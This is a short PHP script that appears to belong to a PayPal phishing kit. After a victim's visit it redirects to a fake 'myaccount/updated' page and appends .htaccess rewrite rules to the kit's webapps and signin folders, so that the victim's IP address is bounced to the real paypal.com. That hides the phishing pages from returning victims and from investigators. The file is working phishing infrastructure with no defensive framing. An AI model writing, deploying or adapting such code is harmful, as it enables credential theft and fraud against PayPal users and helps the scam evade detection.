<?php
include('detect.php');
header("LOCATION: myaccount/updated?/" . strtoupper(md5(gmdate('r'))));
$file['1'] = "webapps/.htaccess";
$file['2'] = "signin/.htaccess";
$open1     = fopen($file['1'], "a");
fwrite($open1, 'RewriteCond %{REMOTE_ADDR} ^' . $ip . '$
RewriteRule .* https://www.paypal.com [R,L]
');
fclose($open1);
$open2 = fopen($file['2'], "a");
fwrite($open2, 'RewriteCond %{REMOTE_ADDR} ^' . $ip . '$
RewriteRule .* https://www.paypal.com [R,L]
');
fclose($open2);
exit;
?>